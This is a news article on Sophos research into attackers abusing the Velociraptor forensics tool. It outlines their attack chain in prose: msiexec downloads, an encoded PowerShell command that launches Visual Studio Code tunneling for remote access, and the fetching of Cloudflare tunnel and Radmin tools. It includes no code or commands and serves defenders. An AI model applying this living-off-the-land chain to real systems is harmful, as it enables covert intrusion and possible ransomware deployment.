Hackers Abuse the Velociraptor Forensics Tool

Sophos researchers have uncovered a cyberattack in which unknown threat actors abused the open-source endpoint monitoring and forensics tool Velociraptor.

“In this incident, the attackers used the tool to download and run Visual Studio Code, likely with the intention of creating a tunnel to a command-and-control server under their control,” explained experts from the Sophos Counter Threat Unit.

Evolving Living-off-the-Land Tactics

Threat actors often rely on Living-off-the-Land (LotL) techniques, exploiting legitimate tools for remote monitoring and management. According to Sophos, the use of Velociraptor represents a troubling evolution of this tactic: incident response software itself is now being repurposed for malicious objectives.

Attack Chain

The analysis revealed that the attackers:

1. Used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain.
2. Deployed Velociraptor from the MSI file, which then communicated with another Cloudflare Workers domain.
3. Leveraged this access to download Visual Studio Code via an encoded PowerShell command, running it with tunneling enabled to provide both remote access and remote code execution.
4. Reused msiexec to fetch additional payloads, including tools such as the Cloudflare tunneling utility and the Radmin remote administration utility.

Warnings and Response

Sophos warns that organizations should carefully monitor for and investigate unauthorized use of Velociraptor, stressing that such activity could be an early stage of a ransomware deployment.

Following Sophos’s publication, Rapid7—the cybersecurity firm that develops Velociraptor—released its own guidance to help defenders detect misuse of the tool.

“Rapid7 is aware of reports warning about the abuse of the open-source incident response tool Velociraptor,” the company stated. “Velociraptor is widely used by defenders for legitimate digital forensics and incident response tasks. But, like many other security and administration tools, it can be misused if it falls into the wrong hands.”